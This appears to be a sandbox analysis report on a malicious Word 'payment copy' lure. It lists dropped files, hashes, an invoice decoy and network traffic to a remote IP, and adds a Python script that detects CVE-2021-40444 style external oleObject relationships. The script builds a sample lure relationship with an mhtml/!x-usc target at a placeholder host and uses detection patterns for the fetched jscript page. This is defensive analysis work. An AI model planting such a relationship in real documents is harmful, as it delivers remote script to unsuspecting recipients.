    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal68.expl.evad.winDOC@1/20@7/1
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .doc
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
    • TCP Packets have been reduced to 100
    • Report size getting too big, too many NtOpenFile calls found.
    • Report size getting too big, too many NtQueryAttributesFile calls found.
    No simulations
    No context
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):131072
    Entropy (8bit):0.2880914581185761
    Encrypted:false
    SSDEEP:48:I3rTGRB0Di+ZizW+BY4dCh0ERieLrEorjO56VcH:K+Li58zWaY6iYA86VcH
    MD5:B53533125231DD0B586CB6715AE19CB6
    SHA1:A9E7566E4BB7CA451B8D9E3559C7F63607A4BD3E
    SHA-256:4BC81648A241EC2BC277A80D232691CD168B4DCC768B323D509ECD740BE75CF0
    SHA-512:D2F54F0347C2C9BD1268F7958DC3B3B76A8C962D6FC425E3C33D32F9DB142B266DADEB462189677E0CABFB024AAF94F186CC958C3A27D01545E6FA1EF11C8FD1
    Malicious:false
    Reputation:low
    Preview:......M.eFy...z2&&..L.I..)...S,...X.F...Fa.q............................_...)..H..:Q.P..........'d.....F.?I.O.P..A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):131072
    Entropy (8bit):0.6693472333421685
    Encrypted:false
    SSDEEP:96:K3G8RCyr8OairdIwgNOoGzn/iNFD3depKCHf6XZoZGPY/MkfO:jYdmBGT/wFD3depKCHf6XZoZeMMkfO
    MD5:5FC240531A725DDD31B36CFC13E5A401
    SHA1:AAA4F0EE3AB6F3A36E5D00218E8CA4167B7DE64C
    SHA-256:2AC86D569E45C0C59AC8046F7CC2BF0A149F46ED0B92CE93E7FAE2328FD3575A
    SHA-512:E93C0C34DF4D673203BE4CA5EB1179ED463255EF6084BED59BEC440B3742CFF6A94CAA0424DB968A6ECF580F6F4106ACED5285083F97772C655B8883D516C733
    Malicious:false
    Reputation:low
    Preview:......M.eFy...z/$..zl.K.e.yH...S,...X.F...Fa.q............................dn..5s$F..a..Ur........._{k..).E.pC....U.S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):114
    Entropy (8bit):4.0043834000059455
    Encrypted:false
    SSDEEP:3:yVlgsRlz1lDCrrPjlYDYwlVlc3lX3pQlQMDZ276:yPblz1Rsr+YAc3lnLMDZ22
    MD5:29CE4C3AD91CA4ED32D0FE57B495FCC5
    SHA1:EFD857E3CAAFBDE2AE85672CFD4DCD99458CF465
    SHA-256:E19CB2B28AC900FD40B61E0807007B538CDEE091A0CA82F9A76ED48F997CB7C8
    SHA-512:6AE9097FBAF9A541667BB44C9A5999ECD23A35E2C2291486067D7110960C3F0D35FBD2DF82864EA376456F16D4CF0E510F5AEFB0144FBC3DB061EC68E36FEC8A
    Malicious:false
    Reputation:low
    Preview:..H..@....b..q....]F.S.D.-.{.9.D.7.4.1.6.6.3.-.0.E.5.4.-.4.7.3.1.-.8.0.9.5.-.2.2.2.D.B.9.2.A.C.F.5.6.}...F.S.D..
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):131072
    Entropy (8bit):0.2866055829360173
    Encrypted:false
    SSDEEP:48:I31CRB6Cyp8tAgBWZFbQRczx8tbu4WubrfDslgRpcCDC1H:KAL6CyYAgBWr2ceu4WunfQce1H
    MD5:8F0A4FA071D865E8A556C2157191813E
    SHA1:C92BC60B1C41760B7D4768C673AD0A4356FC8ED6
    SHA-256:3406B7EC52AC5F6955F939021B73EB1AFE6938BAB96EB60FEE8E7AD52799997D
    SHA-512:8EBCF339C677C2C42FDC9131A5FEBB31D49F928BF7A5C5DA0C0F6B8BC2B6A04644BD5BD2A8381CFF4D66BB9A215E1539EE397FF1DBC2C899A2A28134A328643D
    Malicious:false
    Reputation:low
    Preview:......M.eFy...zQ..3.O.M...L?.)S,...X.F...Fa.q...............................{..O.].'.D...........).....B......m.A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):131072
    Entropy (8bit):0.22184406153599004
    Encrypted:false
    SSDEEP:48:I3+3UrBptM1865ZNUgqKS0ip6NIN1ZpIN1Z7:K+3CptivE0jy6NINHpINH7
    MD5:354B23BB2531B0571E7808EF78C2BDDB
    SHA1:5959F89837C462172341FB541F34BE8556378E0C
    SHA-256:C825D9DF8C6FFBC827CF12D1653ABB948DE07317F1EF7D5DD2E66E6B39B78497
    SHA-512:93DD7F49CCB09725D871B6C509721064EE89CA449B92C385610CE6F5F416188E842F556615864906E367C0AFE74880413D86FB53483BB96BFB02013E29471744
    Malicious:false
    Reputation:low
    Preview:......M.eFy...z...T.rM....)T..S,...X.F...Fa.q...............................7do.B.Y.n._R.........r......I...F.@.-P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):114
    Entropy (8bit):3.938508180669744
    Encrypted:false
    SSDEEP:3:yVlgsRlziLVNOlQglm7SwORgQ3ggOSjRYUC/l276:yPblziL/Ol18ew7Q3gajRYUCt22
    MD5:53F7D146048797564ACAEC8B2819EF0B
    SHA1:7DCC293F430710EC6929DFA75DDFB1EEC2A867E6
    SHA-256:18FCDCB36C0D51EF510D8A33065F575DDD212BB7D54FF3767D31AE26D2597345
    SHA-512:47EE50ACD25866E2B0EF2E20CA721C126E8D313FB6112F397877A6B12D1E989B79F64FFB930E022226BA5AA179DC4744A8CF3E4B35D2C24A2E665F58B40561FB
    Malicious:false
    Reputation:low
    Preview:..H..@....b..q....]F.S.D.-.{.F.C.3.E.0.7.E.1.-.8.E.C.D.-.4.3.E.4.-.B.5.2.E.-.9.C.0.E.7.5.9.4.5.7.7.1.}...F.S.D..
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:HTML document, ASCII text, with very long lines (6346), with CRLF line terminators
    Category:dropped
    Size (bytes):8032
    Entropy (8bit):6.106485999431441
    Encrypted:false
    SSDEEP:96:+Y8gdLn2wOlVE82u5WUqhy0J2bnR5PojA6pAohjN6pKpGPZCzYw9gz1fUIN3U0s:+Y7L2wO9IUNv5PoV6w6peGRx7pE0s
    MD5:7934E5C18F2C7C53DCE7C8C7CE55125D
    SHA1:8C75630C574D0745E4F3B71B26057C990E2BB467
    SHA-256:7C92FD542BC5E2B201FB2DE4FC1DACE37FF9DFC02CE40FD1BD26E61ED41DB3EA
    SHA-512:1E8D31AF033C0E3DF7D4DCF427D92702F733E13CE1686E0E1BDB0711E882F2AE18C479F363A535B366D1A4838E363C163513B7091DD81CBD9961D18C1C293C13
    Malicious:false
    Reputation:low
Preview:<!DOCtYpe HTML>....<HTML>....<BoDY>....<SCrIPt tYPE="tExT/jscriPt">....
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=11, description=OLYMPUS DIGITAL CAMERA , model=SP500UZ, software=Corel Photo Album 6, datetime=2007:10:21 17:05:13], baseline, precision 8, 480x640, components 3
    Category:dropped
    Size (bytes):111840
    Entropy (8bit):7.447827528335342
    Encrypted:false
    SSDEEP:3072:/y1vPicYqXVc2XcRz09vkDMaIRFzOuPiSlKd9Y:qdfYqX6G00zfaSlWY
    MD5:4D697D690AB2D1BAC4998162A6EEAE07
    SHA1:6864EAD35FB3B3FBE354AC8D7BC3AFA3204B9522
    SHA-256:23D679960625F65787692D74E87E324E5304B7F923E340322575D330FE510450
    SHA-512:201266787A62F1603C7B908A74B7FBE5A06E38CF581B8B8F8D8D56F9804C6020822E1C3B799321980DAD326E751CE9E0C969979BC96D4A62AC25D7C4259574A9
    Malicious:false
    Preview:......JFIF.....`.`.....vExif..MM.*............. .................1...........2..................................Q...........Q........!..Q........!...i..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Composite Document File V2 Document, Cannot read section info
    Category:dropped
    Size (bytes):4608
    Entropy (8bit):2.2918709222363574
    Encrypted:false
    SSDEEP:24:rNKOUp03SHIDFJIDfrBexrBez7HrBeIiOID:rNKKtKfrBWrBYjrB/iD
    MD5:DDD1A7B7584FE963025B7877753363E9
    SHA1:3231DC3627E692457A46A5A232F3C08EED393593
    SHA-256:56E7BBA8F55A2766D6BFE10F89AC631AE171A800B017FC5E7BFA1B86830DFFAA
    SHA-512:34F084E344268DE2F67AD2674B6E2A7915E2F9023F79ED3E2C6BB3A12300321097C7A1139CE147D7B7BCFBBD2226FCE086094355B184053172A1E26454D55D5D
    Malicious:false
    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Targa image data - Color 32 x 7 x 32 +32 +7 "\007"
    Category:dropped
    Size (bytes):22016
    Entropy (8bit):3.726896001733367
    Encrypted:false
    SSDEEP:192:L/iOgOnpOwOdOiA4vzxO6LvF6iCs3LGL9Ql/XWMjZcLPOiCzS2zcFLNkIsehNACh:LTl0V4VF63Nr+eE1
    MD5:2D3B22EB9A941A88E1FBE9CC6F0AD47B
    SHA1:3BABC72BE2E9724860AFCBC84F6F084BCE67C05A
    SHA-256:077B64253FAF9C648A350EEB76A4583D396A9F390D2732B73E024DE756ECB52F
    SHA-512:B913ED1B0EA6AF625102C2E48C20084408B7C34067EF127FC4A0BFBC8B447A56D5F45659D6FE89694BF1224CB411CFF7EA76444361F036567B2EECA6A738CE41
    Malicious:false
    Preview:.. ..... ... ... ... ... ... ... ... ..... ... ... ... ... ... ... ... ... ... ..... ... ... ... ... ... ... ... ... ... ..... ... ... ... ... ... ... ... ... ... ..... ... ... ... ... ... ... ... ... ... ..... ...P.R.O.-.F.O.R.M.A. .I.N.V.O.I.C.E..... ....... ...C.o.m.p.a.n.y. .:...A.L. .J.A.D.D. .T.R.A.D.I.N.G. .&.C.O.N.T...E.S.T.....I.n.v.o.i.c.e. .#. .:. .1.4.7.1.9..... .....A.d.d.r.e.s.s. .:...S.A.L.A.L.A.H...O.M.A.N.....D.a.t.e. .:...1.7.-.0.7.-.2.0.1.9..... ......... ......... .....T.e.l. .:............................................. ...$...............................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1024
    Entropy (8bit):0.05390218305374581
    Encrypted:false
    SSDEEP:3:ol3lYdn:4Wn
    MD5:5D4D94EE7E06BBB0AF9584119797B23A
    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):131072
    Entropy (8bit):0.02557421810106493
    Encrypted:false
    SSDEEP:6:I3DPce3FvxggLRd68ShIKfljt3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPJpSjbvYg3J/
    MD5:79629860A8A7062100568BA988AA92E5
    SHA1:04EB84E685B4ED1633C9A24F945CA4E4EFF440F9
    SHA-256:B4490EEF80275645ADF8E6DA434925E61B0C7E7CEC78BDA28C80A45593674C25
    SHA-512:44032143469737F083D1B979DD04BBC9C28DB3584812810DE216ADE8E0763D6FDBE6235F73A5582D86839EE63C963712BA36349F865723509E8D4A909DA3B45E
    Malicious:false
    Preview:......M.eFy...zQ..3.O.M...L?.)S,...X.F...Fa.q...................................D.'B...O..........).....B......m.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):131072
    Entropy (8bit):0.025598214431537702
    Encrypted:false
    SSDEEP:6:I3DPcA2VvxggLRqNf/XiZkqxFRXv//4tfnRujlw//+GtluJ/eRuj:I3DPIZsXGdvYg3J/
    MD5:4E0BB04AF2E5963F5B13FE28926EA850
    SHA1:A1F8759D658FE4FD793A0C6756BE56CF1BAA6C5E
    SHA-256:144E84C6E11326F22EC9934B0C473BD33708C4D1AAC32A967D083E7A0F7B9742
    SHA-512:4037BD00DB042D87AADE73C529F218778ABF1675C6BD37F8AA25F4CE38E18E77470661710711D16B7D809AAEE9288C032F7A31A1CF46B882203D53A289CF4975
    Malicious:false
    Preview:......M.eFy...z2&&..L.I..)...S,...X.F...Fa.q............................)...w.5D..(T.w..........'d.....F.?I.O.P......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:56 2022, mtime=Tue Mar 8 15:45:56 2022, atime=Tue Dec 20 21:07:13 2022, length=110504, window=hide
    Category:dropped
    Size (bytes):1089
    Entropy (8bit):4.586578560978497
    Encrypted:false
    SSDEEP:12:8ovgXg/XAlCPCHaXNBQtB/SxXX+Wdl91UWY5iEcH4icvbTXevyXl4KDtZ3YilMMe:8i/XT9SUXmWZEcHreHXevy1ZDv3q+u7D
    MD5:42568C6DD23F1300A99ED8669616B647
    SHA1:205A7AEEA5E8CC501DE65B0398F6511123590B6E
    SHA-256:403995B5D0C5466BCD2EA065BCFA60259DE797DA2B36290DC6D140F2FEBEF164
    SHA-512:16464D686024260D930ECA3255461A6130CD7B0B33A9474CAE72F7A03BBEE55B733BFB8195594F31E65A07FEC80ECBE9A06FFB1C91C4336430D251E9E4B30DBD
    Malicious:false
    Preview:L..................F.... .....r..3....r..3....0j.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......U. .PAYMEN~1.DOC..h......hT..hT..*...r.....'...............P.a.y.m.e.n.t. .c.o.p.y._.2.9.1.1.0.2.2...d.o.c.x...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\377142\Users.user\Desktop\Payment copy_2911022.docx.doc.4.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.a.y.m.e.n.t. .c.o.p.y._.2.9.1.1.0.2.2...d.o.c.x...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X..
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Generic INItialization configuration [doc]
    Category:dropped
    Size (bytes):101
    Entropy (8bit):4.8491372958945425
    Encrypted:false
    SSDEEP:3:bDuMJltDLhVjO1LXJFSmX1OeLhVjO1LXJFSv:bCmDFVyBZFEeFVyBZFc
    MD5:83166E435F433132ECCE71984113EC6B
    SHA1:630B8125CF2F042D3C939B375300C4A03B849927
    SHA-256:DEE2789C5DBCFF0EA579537C38D15E0626092269B5842B7D1BAAFBA4DC43F308
    SHA-512:DFE14FDBE0BC45AD547A41CE549670CD1F9B39210E698A09BF558D643B7159D740E7C52A2773F6F9E44AD9FF07DE877C8FDD709864CA8668556B86AA82135D9B
    Malicious:false
    Preview:[folders]..Templates.LNK=0..Payment copy_2911022.docx.LNK=0..[doc]..Payment copy_2911022.docx.LNK=0..
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.503835550707525
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
    MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
    SHA1:23684CCAA587C442181A92E722E15A685B2407B1
    SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
    SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
    Malicious:false
    Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
    Category:dropped
    Size (bytes):2
    Entropy (8bit):1.0
    Encrypted:false
    SSDEEP:3:Qn:Qn
    MD5:F3B25701FE362EC84616A93A45CE9998
    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
    Malicious:false
    Preview:..
    File type:Microsoft Word 2007+
    Entropy (8bit):7.994989792624349
    TrID:
    • Word Microsoft Office Open XML Format document (49504/1) 49.01%
    • Word Microsoft Office Open XML Format document (43504/1) 43.07%
    • ZIP compressed archive (8000/1) 7.92%
    File name:Payment copy_2911022.docx.doc
    File size:110504
    MD5:cd3dbd5f1d468da826581361b619b393
    SHA1:9d5fc2d99aec7c8c18d8af7267b4a31801fda770
    SHA256:1c6189f068ee3870e1d41511bd55c02cef9d98a816a963a26f95ff0b6becea1f
    SHA512:91ae486d3b8a687ce2e994ee179161896f71f6c0e973b1ebd52ff856753ccc8cb5b7e0c7890c87158a558e74e061281d4bf6dd37e9941b3593a3ccbd77f71bdf
    SSDEEP:1536:oI2CqvURAICmRMMlzJEGEBwNQFgbLndOxR8qn7CJcsqKqLzDOfFGpt+rlTuq:vTADANPLNQUkRhnm9qKqqgt+r0q
    TLSH:56B3021A16401374FBCF83FCF954890FD85B2974EB05BE441E9CEEE8A4AD3411D2D669
    File Content Preview:PK........h..U...p`...T.......[Content_Types].xmlUT...H..cH..cH..c.T.N.0..#....U...B.i.,G.D......o.....7%B(4.m/..y.X..O.Zek.AZS.Q1$..n.4uI......BdF0e..d..L'.W...A..mBI.1.{J._.f....V*.5.x.5u......pxK.5.L.c. ..#Tl.b....&...H....WI.sJr..N.F.r....2.......@h.C
    Icon Hash:e4eea2aaa4b4b4a4
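The dropped HTML entries above are what WINWORD.EXE fetched and cached while opening this Word 2007+ package: a page with case-randomised tags and a text/jscript script block, which is how a document reaches MSHTML in a CVE-2021-40444 style lure. The hook that makes Word fetch it is an oleObject relationship in word/_rels/document.xml.rels whose Target is an mhtml: URL carrying an !x-usc: redirect and TargetMode="External". The Python script below is an added example, not part of the Joe Sandbox report and not the sample's own content: it opens an OOXML package, lists its external oleObject relationships, matches the mhtml/!x-usc form, and checks a dropped HTML file for the jscript block regardless of tag case. The package it builds, the example.invalid URL and the HTML snippet are constructed placeholders.

```python
"""Static checks for a CVE-2021-40444 style lure: the external oleObject
relationship in the OOXML package and the jscript block in the fetched HTML.
Added example, not part of the Joe Sandbox report."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
RELS_PART = "word/_rels/document.xml.rels"

# mhtml:http://host/a!x-usc:http://host/b - the scheme that makes Word hand
# the remote page to MSHTML instead of treating it as an embedded object.
MHTML_XUSC = re.compile(r"^mhtml:https?://[^!]+!x-usc:https?://", re.IGNORECASE)

# <script type="text/jscript">, matched case-insensitively because the dropped
# file in the report randomises tag and attribute case.
JSCRIPT_TAG = re.compile(rb"<script\b[^>]*\btype\s*=\s*[\"']?text/jscript", re.IGNORECASE)


def external_ole_relationships(docx_bytes):
    """(Id, Target) for every oleObject relationship with TargetMode="External"."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if RELS_PART not in zf.namelist():
            return []
        root = ET.fromstring(zf.read(RELS_PART))
    return [(rel.get("Id"), rel.get("Target", ""))
            for rel in root.iter(f"{{{REL_NS}}}Relationship")
            if rel.get("Type") == OLE_REL and rel.get("TargetMode") == "External"]


def is_mhtml_xusc_target(target):
    return MHTML_XUSC.match(target) is not None


def has_jscript_block(html_bytes):
    return JSCRIPT_TAG.search(html_bytes) is not None


def triage(docx_bytes, dropped_html=b""):
    rels = external_ole_relationships(docx_bytes)
    mhtml = [target for _, target in rels if is_mhtml_xusc_target(target)]
    return {
        "external_ole": len(rels),
        "mhtml_xusc_targets": mhtml,
        "dropped_html_jscript": has_jscript_block(dropped_html),
        "suspicious": bool(mhtml),
    }


# Constructed sample input; example.invalid is a reserved placeholder, not the
# URL in the real sample.
LURE_TARGET = "mhtml:http://example.invalid/lure.html!x-usc:http://example.invalid/lure.html"


def build_sample_docx(target=LURE_TARGET):
    """Smallest OOXML package whose document.xml.rels carries one external oleObject."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
        f'<Relationship Id="rId5" Type="{OLE_REL}" Target="{target}" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr(RELS_PART, rels)
    return buf.getvalue()


# Constructed stand-in for the dropped HTML, mimicking its case-randomised tags.
SAMPLE_HTML = (b'<!DOCtYpe HTML>\r\n<HTML>\r\n<BoDY>\r\n<SCrIPt tYPE="tExT/jscriPt">\r\n'
               b'var a = 1;\r\n</SCrIPt>\r\n</BoDY>\r\n</HTML>\r\n')

if __name__ == "__main__":
    print(triage(build_sample_docx(), SAMPLE_HTML))
```

Run it against a real .docx by passing the file's bytes to triage(); an external oleObject relationship by itself is only a lead (templates and linked objects use it legitimately), while the mhtml/!x-usc target form is what turns it into a verdict.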
    TCP Packets
    Timestamp                            Source Port  Dest Port  Source IP       Dest IP
    Dec 20, 2022 14:08:01.217870951 CET  49175        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:01.217945099 CET  443          49175      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:01.218025923 CET  49175        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:01.240758896 CET  49175        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:01.240813971 CET  443          49175      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:01.866564035 CET  443          49175      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:01.866779089 CET  49175        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:01.874716997 CET  49175        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:01.874756098 CET  443          49175      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:01.875518084 CET  443          49175      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:01.875665903 CET  49175        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:02.181982040 CET  49175        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:02.182032108 CET  443          49175      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:02.497220039 CET  443          49175      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:02.497322083 CET  49175        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:02.497358084 CET  443          49175      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:02.497422934 CET  49175        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:02.512947083 CET  49175        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:02.513202906 CET  443          49175      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:02.513262033 CET  49175        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:02.513427973 CET  49175        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:04.203759909 CET  49176        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:04.203811884 CET  443          49176      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:04.203902960 CET  49176        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:04.204251051 CET  49176        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:04.204268932 CET  443          49176      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:04.784801006 CET  443          49176      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:04.785031080 CET  49176        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:04.806432009 CET  49176        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:04.806485891 CET  443          49176      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:04.807271004 CET  443          49176      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:04.837964058 CET  49176        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:04.838026047 CET  443          49176      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:05.358891010 CET  443          49176      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:05.358973026 CET  443          49176      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:05.359105110 CET  49176        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:05.359148026 CET  49176        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:05.359164953 CET  443          49176      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:09.436860085 CET  49177        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:09.436899900 CET  443          49177      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:09.436964989 CET  49177        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:09.438842058 CET  49177        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:09.438859940 CET  443          49177      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:10.057029963 CET  443          49177      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:10.057256937 CET  49177        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:10.064673901 CET  49177        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:10.064733982 CET  443          49177      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:10.065263987 CET  443          49177      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:10.099788904 CET  49177        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:10.099848986 CET  443          49177      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:10.668241978 CET  443          49177      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:10.668354988 CET  443          49177      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:10.668445110 CET  49177        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:10.668802977 CET  49177        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:10.668828964 CET  443          49177      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:10.668850899 CET  49177        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:10.668858051 CET  443          49177      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:10.668876886 CET  49177        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:10.668881893 CET  443          49177      118.27.125.229  192.168.2.22
